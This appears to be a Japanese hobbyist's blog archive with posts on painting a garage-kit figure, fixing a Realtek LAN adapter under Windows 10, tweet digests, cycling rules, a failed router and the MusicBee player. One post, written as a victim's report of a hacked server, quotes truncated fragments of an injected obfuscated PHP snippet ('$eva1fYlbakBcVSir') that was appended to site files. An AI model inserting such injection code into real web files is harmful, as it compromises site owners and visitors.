タグ: HP

Fenrir オリジナル燈狼

2011年の冬にワンフェスにて購入したFenrir オリジナル燈狼を作りました。
残念ながらディーラーさんのHPは無くなってしまいましたが、まぁ購入時にパーツチェックしてあるので、特に問題は無いかと思います。
まぁもっと早く作れって事だよね・・・

このガレージキットは着物を着ているってことで、完成見本には、着物の柄も書かれていましたが、今回は描きませんでした^^;
良いデカールないかなぁ~って、探したのですが、見つからなかったです・・・まぁ眼は自分で描き入れている分けだから、描けよって言われたら元も子もないですが、まぁ今回は時間の都合で無しということで…

ということで、完成させた写真です。

IMG_0295IMG_0298 IMG_0297IMG_0296IMG_0299 IMG_0300IMG_0302

このガレージキットは個人抜きってことで、結構気泡や歪みがあって苦労しました><
なので、おもったより時間がかかってしまい、着物の柄までやる余裕はありませんでした・・・

まぁそれでも完成したのでOKでしょ罪にならなくて良かった

使用カラー


111 キャラクターフレッシュ(1)の後、影でg054 ノーツフレッシュオレンジ
更にg059 サフレス フレッシュピンク+112 キャラクターフレッシュ(2)を吹く

眼帯+首輪+ベルト
GX2 ウィノーブラック+189 フラットベース「なめらか・スムース」

髪の毛+しっぽ
g052 ノーツフレッシュホワイトの後、影で174 蛍光ピンク
その後残りの塗料に11 ガルグレーを入れシャビシャビにしてコート

耳封緘
X-12 ゴールドリーフ

着物
下部
113 RLM04イエローの後、影で58 黄橙色
中部
59 オレンジ+173 蛍光オレンジ
上部
79 シャインレッド+171 蛍光レッドの後、影で100 マルーン

着物襟
GX1 クールホワイト
g037 純色バイオレット
着物帯+リボン
59 オレンジと173 蛍光オレンジ
着物帯締め+ベルトシルバー
X-11 クロムシルバー


GX2 ウィノーブラックを下塗り
シルバー 明るめ

GX2 ウィノーブラック


GX2 ウィノーブラック 一部艶消しの為189 フラットベース「なめらか・スムース」を混ぜて塗装

高下駄
GX2 ウィノーブラック

鼻緒
67 パープル+GX1 クールホワイト
足袋
GX1 クールホワイト


g037 純色バイオレット
g050 クリアーホワイト


アクリラガッシュで塗装後181 スーパークリアー半光沢でコート
その後クリスタル ジェル メディウムで盛り

基本Mrカラーで一部ガイアカラーとタミヤエナメルを使用して、眼はアクリラガッシュといういつもの方法で、やってます。
そろそろサフレスとかやってみたいと思いつつ、なかなか踏ん切りがつかない、おっさんですが、これからも末永き見守ってください^^

さて次は何を作ろうかなぁ~

Windows10にしたらLANつながらね~し

今回の記事はほぼほぼ愚痴です。
もしRealtekのLANの事でここにたどり着いた方は記事の下の方の結論のちょっと前から読んでもらえると幸せになるかもしれません^^;

 

Windows10がリリースされて、試しに入れたPC(Windows7  PRO 32bit Core2Duo E8400 メモリ4GB)が問題なく動いたので、他のPCもどうせならWindows10にしちゃおうかなって事で、ゲーム用のPCもWindows10にしたのですが、OSは問題なく動くんだよ

でもね LANが認識しないのよ

今どきのPCったらネット見れなきゃ意味ないでしょ!!

オンボードの蟹さん(Realtek RTL8111E )が繋がらない まぁ蟹だから安定性はないけど、結構普及しているチップでしょ

一体どーいうことよって思って

ネットで調べてもまともな解決策が無かったから、その時はTwitterに愚痴ってWindows7に戻したんだよ

で、後日Twitterにリンク速度下げれば繋がるよって返信来たから、時間があるときに試せばいいかって思っていたのよ

でもさ、普通にWindows7立ち上げるとWindows10にする準備ができましたってダイアログが、また起動するたびに出るようになったんだよ

不具合があったからWin7に戻したのにね

で、RealtekのHP行ってドライバがリリースされたから、ダメもとで、やってみようかな~って思って、今日Windows10に再び挑戦しました~!!

Windows10は問題なく入りましたよ

であらかじめダウンロードしておいたドライバをインストールしたんだよ
繋がらね~

おいおいだよね

何のためにリリースしたのかわかんねーじゃん!!

まぁTwitterの返信にあったリンク速度を落とすって事も試したんだよ

ダメだったわ~><

自分のPCだとダメみたい まぁ環境によるんかなぁ~

で、どうしようか考えて、思いついたのが

ハード再認識させればどうかなぁ~ってことで

デバイスマネージャーからRealtek PCIe GBE Family Controllerを選んで、削除

そしてハードウェア変更のスキャンを実行したら普通に再認識してLANが使えるようになったんだよ

まぁこの方法ってWin98の頃からSCSIを後から認識させたりPIO病やらでやったことがあったけど、まだ有効なのね

やっぱりWindowsは古の呪縛から逃れられないのか・・・

 

結論  RealtekのNIC(LAN)がどうもうまく動かない時は、一度デバイスマネージャーからRealtek PCIe GBE Family Controllerを消して、再認識させるとうまくいくかもよ
まぁこれは他のハードウェアでも言えることです

ちなみにうまくいかなかったPCはTUKUMOのBTOでG-GEAR GA7J-C43/Eです。 これにSSD追加とOSをWin7 Pro x64、サウンドカード追加したものになります。

一週間のつぶやきダイジェスト for 2012-05-06

  • 富士川のスタバでまったり #
  • #
  • 昼ですね #
  • NASにいろいろ突込み中 #
  • 昨日のまほろさん被ってなかった #
  • 眠くなってきた #
  • 朝からムズムズ花粉が飛んでいる模様・・・ #
  • 風が強い この風を使って家中の埃を出さねば #
  • シリコンが手に付いてなかなか取れない #
  • コトブキヤ立川店無くなるのか・・・ ガンプラとフィギュアでお世話になった店なだけに残念 #
  • 明日は雨か・・・ 農作業が止まる・・・ #
  • ファインモールドって金型製作時、銅マスター作るタイプなのか どうりで細かいわけだ #
  • なんだか戦車のプラモが作りたくなってきた。そういえばまだ一度も作ったことが無いなぁ~
    なんとなくタムタム行きたくなってきた #
  • キャラ、ロボ、車、船(軍艦)、飛行機(戦闘機)はあるが、戦車は無い 戦車は車のカテゴリーに入れていいものだろうか #
  • ポコポコ 太鼓の音が聞こえる・・・ #
  • 模型屋行きたいが雨・・・ 戦車~ #
  • サイクルぴっとイノウエのHPが変わった・・・ CMSのwebchanger系なのね 刈谷は変わったが岡崎はそのまま #
  • 覆パトが家の前を通過 #
  • そろそろUbuntu 12.04を入れようかな #
  • Ubuntu自分が使いたい方向性とどんどんかけ離れていく・・・

    Mintへ移るか #

  • というか普通にWindowsで問題ないのか #
  • 種まき終了 #
  • つかれたびー #
  • 戦車のプラモ買いにタムタムへ行きたい 誰か~^^; #
  • @toraha2_SEENA 好きだねぇ~ #
  • NASシャットダウン #
  • @toraha2_SEENA ちゃりで行けと仰るのですか・・・ 道連れと帰りの交通手段とチャリ用のナビを用意してくれれば良いですよ #
  • とりあえずルート考えてみたが、500m級の峠ってか・・・ かなり遠回りしても100m級峠と・・・
    膝逝くね・・・ #
  • アニメの聖地めぐりで電波女と青春男(名駅)とインデックス(立川)、Air(国立)、小麦ちゃん(秋葉)、Fate/Zero(明治村)は行った
    一部後から聖地って知ったが・・・
    まぁ他にも知らず知らずに行った事があるかも #
  • @OUTRUNABOUT 大丈夫? #
  • けいおんの聖地? #
  • @erurimu123 1日1冊はやり過ぎ1週間で1冊だよ #
  • 必要なカラーを選定中 たぶん最低でも4色は買ってこないといけない・・・ #
  • あとの色は艶消しや調色すれば何とかなると思う そもそもミリタリー系の色が全然無い・・・ #
  • 揺れたお~ #
  • あいうえお #
  • コシヒカリの田植え終了
    片付け中・ #
  • 今日は雨が本格的に降り出す前に終わってよかった
    雨の中やっている人もいるけど・・・ #
  • あれっ 雨やんでる #

えっ愛・地球博記念公園のサイクリングコースって・・・

フレに、スポーツ車で、愛・地球博記念公園のサイクリングコースが走れないって聞いて、調べてみたら、かなりがっかりな内容

その内容・・・

持ち込みできない自転車
・一輪車、三輪車、補助輪・補助棒付き自転車、
・自転車でけん引する自転車、変形自転車、複席車(タンデム)
・幼児用補助椅子にお子様やペットを乗せての自転車走行
・ブレーキがない自転車
・土日祝日のロードバイク等高速走行を目的とした自転車(ドロップハンドルで前2段、後ろ10段の変速機能を有するもの)
全日ともコース内の高速走行はできません。

詳しくはHPにて確認を

しかし、ロードバイク不可って・・・
しかも高速走行不可・・・
要はゆっくりママチャリで走れと・・・

なんじゃそれ~><
せめて月に1回ぐらいはロード等で高速走行できる日を作ってほしい

 

まぁ一応俺のはクロスバイクだからぎりぎり引っかからないと思うが・・・
釈然としない

一週間のつぶやきダイジェスト for 2012-01-22

  • リスト作るのめんどくさいので・・・・ #
  • ナイトライダー ネクストってこっちじゃやらないのね #
  • ギャラリー等が動いていない・・・ coreserverで何かあったのかな #
  • 2011/12/10あたりのメンテが原因っぽそう #
  • むむ なんかCoreserverに置いたデータが書き換えられてる まさかまたウイルス騒ぎだったりして17日の15時あたりに集中している 怖いな #
  • phpMyAdminの脆弱性って奴かな #
  • value-domain コンビニ払いに対応したんだ あと数日早ければ・・・ #
  • header,footer,indexの名前が入ったphpファイルは全部書きかえられている模様 とりあえず全部消してバックアップから戻した方がいいかな #
  • メインPCのウイルスチェック終了 1つ見つかったがうさみみハリケーンの誤検出なので問題なし というかいまだにAvastは直してないのね #
  • 追加default.phpもだめ #
  • とりあえずHPとBlogは復旧 で、あとはギャラリーと 時間かかるなぁ #
  • F1の地上波での放送なくなるんだ・・・ とりあえずBSではやってくれるからいいけど残念だわ #
  • 愛知県沖でメタンハイドレートを採掘するのか #
  • grooveshark意外といいかも #
  • むむ まただれかNASでブロックされてる #
  • megauplode閉鎖されたんだ #
  • SONYのAシリーズのウォークマンちょこちょこ品薄店が出ているから製連が入ったかも そろそろ初期ロットがはけるから2月中旬あたりが買いかな #
  • Amazonでもガレージキット売ってるんだな #
  • megauploadがアクセス不能になったので、自分で作ったり改良したソフト等が消えた・・・ まぁファイルはPCに残っているけど、メンドイからたぶん再UPはしない #
  • んっ? スパムが付いたか・・・ #
  • むむまたNASからメールだ 誰かブロックしたよってさ #
  • ロシアンゴスロリもありですなぁ~ #
  • エポパテでも折れるか・・・・ #
  • あいうえおのパスタ半額券今月までだったよな ムムムムム #
  • 瞬着で折れたの直した でも、また折れそうなんだよなぁ #
  • ガレキって脆いパーツはとことん脆いからなぁ とりあえず現状アルアジフは2回目のサフ待ち、AXLのゲームのキャラ(名前忘れた)はサフまでいけてない #
  • 雨やんだからどこかに行くぞ #
  • 雨だわさ #
  • 濡れ濡れで帰宅 #
  • きこうでんみささんって最近歌うたってないのかな? #
  • ぐぬぬぬ #
  • ガレキ塗装するかチャリでどこか行くか 悩む #
  • カレーの日か #
  • @toraha2_SEENA そういえばチャリ買わないの? #
  • 大須行っても用事無いし何処に行こうかな とりあえず名古屋方面へ向かうか #
  • 大須 #
  • 再度大須 #

サーバーのデーターが書き換えられた

なんだか、サーバーに置いてあるファイルが書き換えられたみたい。

とりあえずバックアップから元に戻したので、現在は復旧しています。

以前にも同様なことが起きているから、また起きないか心配だな

 

書き換えられたファイルはd​e​f​a​u​l​t、 h​e​a​d​e​r、​f​o​o​t​e​r​、​i​n​d​e​xの名前が入ったphpファイルの最後に

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = “7kyJ7・・・・・・・・・・・・・・と続いている文字列が書き込まれている

もしかしたらphpmyadmin絡みかなぁ~って思ってみたり

cVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

一週間のつぶやきダイジェスト for 2011-09-25

  • 分かる道にきた #
  • ブレーキと泥よけにちょっとトラブルが発生中
    家に帰ってからたな #
  • 着 蜘蛛の巣につっこんだ #
  • レジャランから無事帰宅 結局遠回りルートだった #
  • 泥除けは歪んだだけなので戻せるので問題無いが ブレーキから音が出る ブレーキ自体は効くから良いけど・・・歪んでるのかな? #
  • クロスバイクのブレーキ鳴きはどうやれば直るのかなぁ・・・ #
  • @toraha2_SEENA まぁ音が出るだけでブレーキ性能的には問題ないから大丈夫だよ 自転車屋で調整してもらえば直るはず^^ #
  • @toraha2_SEENA まだ買って1年以内だから調整は無料なので大丈夫だよ 1年経ったら1000円だけど・・・ #
  • @toraha2_SEENA うん #
  • ブレーキ調整終了 以外とすぐなのね・・・
    ということで復活だわさ
    このまま何処か行っても雨の危険性があるからどうするかな #
  • 昨日タムタムで重いので買わなかった薄め液購入 #
  • @erurimu123 ゴキブリホイホイを使うべし #
  • @erurimu123 Vitaの個人向けSDKはC#を採用だって XBOX360の個人向けと同じ言語 そして、自分が普段使っている言語です
    今のプログラムもC#です #
  • @erurimu123 個人向けは多分タダになってストアに登録するときは有料で登録かと で、個人向けは、機能制限があり通信機能等を使いたければ上位の開発キットを買えとかかな #
  • @erurimu123 ソニーの公式発表へのリンクね http://t.co/I8vdJBH4 #
  • あっ何か買わないといけないと思っていたものを思い出した Win8試すためのHDDだ・・・ 2TBが5千ちょいで売ってたのに 何のために店に入ったんだよ もう残念ながら家なのでまた今度かな #
  • @erurimu123 無料とは書いてないよ 値段発表されてないから あくまでも願望だよ #
  • @erurimu123 まぁね でも、まだどうなるか分からないさ~ #
  • @erurimu123 うん まぁ発表されたらその時考えましょう #
  • poipoizを落とす難易度レベルは『4』。趣味が同じなら、トントン拍子に恋仲に発展していけます。普通だな。 http://t.co/jH6JLr7x #
  • poipoizを理解する難易度レベルは『3』。自然な時間の流れの中で、自然と理解できる人です。時間に任せましょう。 http://t.co/r1n4lLMb 普通ですな #
  • poipoizさんの恋人【身長154cm】【スタイル⇒98点】【ロリっぽさ⇒85点】【料理が上手⇒99点】【下着の趣味⇒理想!】 http://t.co/GAq9ff9S #新恋人ができた ALLOK問題無しです #
  • そろそろ雨が来ても良い筈なんだが・・・ #
  • 雨来た #
  • この辺は大丈夫か #
  • @erurimu123 流されるなよ~ #
  • NTTの人が電柱登ってる もしかしてこの当たり一帯電話通じない? #
  • @erurimu123 流されてみては・・・ #
  • まだ工事している 光ファイバーが切れたみたいだね #
  • かれこれ3時間以上経っているが、まだ復旧作業してる ご苦労様です #
  • 田畑の見回り終了 被害がチョコチョコあったが、まぁ何とかなるだろう #
  • Google+一般公開されたのか #
  • レジンは溶剤抜けてからの方が強度があるな #
  • 瞬着パテやっぱり嫌いになるかも 特に匂いが・・ #
  • 今日もみかか(NTT)が来たよ #
  • @OUTRUNABOUT 何の動画? #
  • @OUTRUNABOUT 台風そんなに凄かったのか #
  • HPによれば0時から6時までの間で30分間電話が止まるらしい
    ということは6時まで工事するのかよ うるさくて寝れんじゃん 事前連絡ねぇしどうなってるのNTT西日本さんよ #
  • 逢妻駅近くのゲオが潰れたみたい #
  • 世界侵略見終わった
    インディペンデンスデイを歩兵メインにした映画だな #
  • 松屋のビビン丼不味い
    塩辛いだけで残念な味 #
  • @riki_saitou TVでやるのを待つかレイトショーで見ることを勧める 正規料金分の価値は・・・ #
  • 着 とりあえず映画を待つ間にQMAを3クレやって 明日なら半額って知って萎えた・・・ そして、映画とその後の飯が微妙だった #
  • もう風呂入って不貞寝するですよ~ #
  • @OUTRUNABOUT www #
  • H2A 19号機打ち上げ成功したのね #
  • @OUTRUNABOUT キャラメルポップコーンも重要だよ サイズはもちろんLだ #
  • @suzupo_neko おかえり~ #
  • おとなしく家へ帰る #
  • 古いPen4のPCが立ち上がらない もう寿命かな #
  • メインPCが立ち上がらないから ノートPCで縮小作業中 #
  • マザボが逝っているのかな~
    とりあえず電池変えてもだめ
    最少構成にしてもBIOSすら立ち上がらない・・・
    やってらんねぇ~
    MB変えて治すぐらいなら もう全部変えたいよな #
  • 電源が逝ったのかな・・・ #
  • 電源変えてもダメ マザボ確定 こりゃさよ〜ならPCか #
  • PC無理やり復活させたが、どのみち先はかなり短い #
  • @miminashinala 壊れた? #
  • ha-10mini しばらく使ってきたが、やっぱり良いね 高音がすごくきれいに聞こえる 女性ボーカルにはかなり合うね 声がすごくきれいに聞こえる #
  • 006PとCR2032をそのうち買いにいかねば #
  • 呪いの人形を取り外す バイバイ アスカ #
  • 電池買った #

一週間のつぶやきダイジェスト for 2011-08-21

  • 起きてシャワった 今日は電気街散策 #
  • アキバ到着 #
  • 東京駅でおみや入手
    あとはコインロッカーから回収して帰路へ #
  • バス出発まで1時間以上ある 暇だ #
  • バス乗った これから帰る #
  • ヤバイ バスの運転手の運転荒らすぎる 速攻酔った
    耐えれるかな? #
  • 海老海老吐きそう #
  • メロンパン入手 #
  • えっ客乗せた状態で給油ですか・・・
    しかも、国1添いの安城市内のガススタで そして、このまま行けば家の近所(徒歩圏内)通るじゃん途中で降りて〜 #
  • 車内ガソリンくせ〜 そして、安城のドンキ通過 #
  • 刈谷(一ツ木)のビックリドンキー通過 #
  • 名古屋着 #
  • 帰宅 #
  • @erurimu123 おつかれさまでした~  #
  • 脳内再起動中 #
  • @erurimu123 結局見つからなかったの? じゃあ、また伊勢神宮へ行って買うのだ #
  • ホイホイさん用のショップ限定髪の毛を入手した タッタラ~ #
  • 3度寝から起きた というか豪雨で起きた #
  • さて溜まった処理を一気にやらないと #
  • 筋肉痛がきた #
  • 親のPCのHDDが逝ったみたい ぐぬぬぬ、めんどいなぁ~ 買ってこないといけないじゃん #
  • IDEのHDDを買いにいかねば #
  • FirefoxとThunderbirdを更新 #
  • @OUTRUNABOUT http://t.co/zwxx8T0 #
  • @OUTRUNABOUT http://t.co/kaF6Lsw #
  • 親PCの起動できない原因が分かった PCの電源を切る時に行われるWindowsUpdeteが長くてPCの電源を強制的に切った事によるレジストリ破損だった
    HDD壊れて無くてよかった、そしてレジストリ回復してPC起動したからOK #
  • 東京で、結局たいしたものを買ってないことが判明・・・ #
  • ComicRefreshを飲むか保存しておくか・・・ #
  • Firefox更新してからよく落ちるようになった気がする・・・ #
  • とりあえずNASを整理 #
  • @erurimu123 とうもろこし希望 #
  • 11973人目のグーグルパズルマスターの称号を手に入れた!
    私のPQは747576でした。 #googlepuzzle http://t.co/AXnrEr9 #
  • GooglePuzzleには考えさせられたな 頭が固くなっていることを実感 老化かな #
  • 炭酸水不味い #
  • 風が無いので蒸し暑い #
  • @erurimu123 難しいと思うよ まだ初期のPS3みたいにチップ載せた方がいい #
  • とりあえず不味い炭酸水にオレンジジュースを混ぜたがさらによく分からない味になって不味い 苦いオレンジ炭酸ジュース・・・ #
  • 明日花火大会だからそれまでに草刈り終わらせないとね
    今日は午前に雨降って今は曇っているから、昨日と比べたらやりやすいハズ・・・ #
  • ベタベタ #
  • @miminashinala おかえり~ #
  • フィギュア塗ろうと触ったら重なり合ったパーツのサフが剥げた・・・ 一気にやる気0へDown #
  • これによりまほろさんの今月完成は絶望的かも #
  • シュガーファースおいしい 紅茶と一緒だと最高だな ただしかなり甘いので 紅茶に砂糖は厳禁 #
  • わたしのファルコンの続編出てるんだよね 気になるじゃん
    ARIEL EXも出てるし なんだかんだで買うの止まっている本が多いな #
  • @erurimu123 おめでとう #
  • 雨降ってるが、何処かに出かけないと花火渋滞で出れなくなる危険が・・・ #
  • 開催を知らせる花火が打ちあがった #
  • 家の前にポリスがいる #
  • 模型屋行きたい #
  • 花火大会までには脱出しないと・・・・ #
  • 出かける #
  • メッサ雨降ってる 立ち往生中 #
  • 着 濡れた 濡れ濡れです #
  • @erurimu123 飲み会やるの? #
  • 今日刈谷の花火大会はやるのか? #
  • 観光協会のHP死んでるし アクセス出来ても書いてねぇし #
  • もうさ何時ぞやの延期に告ぐ延期で10月の花火にしてくれ #
  • 脱出したいが雨が・・・ #
  • この雨でも花火大会やる気なのか・・・マジか #
  • @miminashinala おはよ~ #
  • わらびもち業者がきた ウザイ #
  • この状況で刈谷わんさか祭りの花火やるのか?
    メッサ雨降ってるんだが・・・ #
  • 花火師さんが花火の打ち上げ現場でビニールシート弄ってる #
  • これで花火大会中止なら判断遅いってクレームになりそうだな #刈谷わんさか祭り #
  • 花火やりやがった #
  • @sumasa 打ち上げてますね #
  • 曇ってるから花火の写真は絶望的 #
  • 地上で破裂したよ花火 大丈夫か? #
  • 刈谷わんさか花火 #
  • http://t.co/GsyPgaJ とりあえず写真 #
  • 花火始まってから人が増えてきた #
  • 堤防で打ち上げる方曇ってて見えん 失笑
    近づかなきゃ見れない花火www #
  • 風が無いから煙が逃げない 真っ白な花火大会 さすが刈谷 #
  • KAKUBUNの社長カーの防犯アラームうるさい ホント迷惑な会社 #
  • 会場へ行く人より帰る人のほうが多い花火大会って・・・ #
  • えっ終わり? ナイアガラは? 文字は? #
  • 終了だね #
  • 終わったあとの煙が田園に広がって幻想的 #
  • 雨降ってきたね #
  • さすが刈谷だやることがすごすぎる こんな寂しい花火大会はないぜ
    明らかに失敗
    でも、そんな刈谷が大好きです^^ #
  • 花火業者さんお疲れ様です かたづけしっかりやってくださいね いつも田んぼに花火の玉のカスが落ちてます 稲刈りの時に困るからちゃんと掃除してね #
  • WordPress.comから15%OFFのクーポンが届いた でもakismetのためにID取っただけで使ってないから・・・ #
  • 道が混んでない・・・ いつもなら10時以降でもコミコミなんだが・・・ #
  • 無性に腹減ってる おなかの中だけ秋に突入 #
  • 雨 塗装できない・・・ 暇人中・・・ #
  • ニンニクピラフの気分 #

無線LANルーターが逝きました

今年の3月に購入したNEC Aterm WR8700N-HPが逝きました。
症状は電源は入る(Powerランプは点灯する)のに、初期化に失敗して起動出来ずに、再起動を繰り返すってところかな(ACTIVEランプが点灯したと思ったとたんに消える)
壊れたルータの症状
まだ半年しかたってないのに早いよね

なんだかなぁ~

まぁたまたまハズレを引いたってことで納得するしかないね
所詮大量生産の工業製品だから

とりあえずサポートへ連絡して、修理ってことになりましたが、はてさて治るかな?

ということで、、しばらくの間、家のネットワークは縮小運用になります^^;
とりあえず壊れた無線LANルーターはアクセスポイントとして使っていたので、有線接続しているNASは、問題ないはず

 

以下はチョイ愚痴なので注意 (さらに…)

MusicBeeがいつの間にか日本語に対応したらしいので入れてみた

MusicBeeがいつの間にか日本語に対応したらしいってことで、早速インストールしてみました。

ダウンロードはこちらから

http://www.getmusicbee.com/

 

とりあえずインストールしたての画面です。

この段階では日本語化されていませんので、公式サイトのフォーラムより日本語ランゲージファイル

をダウンロードしてきます。

URLはhttp://getmusicbee.com/forum/index.php?topic=3258.0

よりJapaneseを選んでダウンロードしてください。

日本語化はダウンロードしたランゲージファイルをインストールフォルダのLocalisationに入れて、、設定でJapaneseを選べば、日本語化されます。

現状では、かなり意味不明な翻訳(たぶんそのまま機械翻訳?)となっていますので、逆に使いづらくなります^^;

ということで、有志の方が作成したランゲージファイルを入れた方が、日本語の翻訳が断然まともな物になります
ダウンロードはこちらから
http://softinfo.seesaa.net/article/149825004.html

とりあえずこれで、通常使う分には問題がないレベルになります。

 

少し気になったのがそのままの状態でASIOを使うとプチプチノイズが入ります

自分の環境だけなのか分からないので一応プチプチが入らなかった設定は

以下の通りです。

WinXPでサウンドカードがSoundBlasterX-fiの場合ASIOのLatencyを10ms以下にする

あまり数値を下げすぎるとPCに負荷がかかるのでお勧めしません

 

とりあえずPCに入っている曲を全部突っ込んだ時の起動時間、ライブラリ操作時の動作はMusicBeeのほうが軽いので、次のバージョンのMediaMonkeyの出来が悪かったらこっちへ移るかもしれません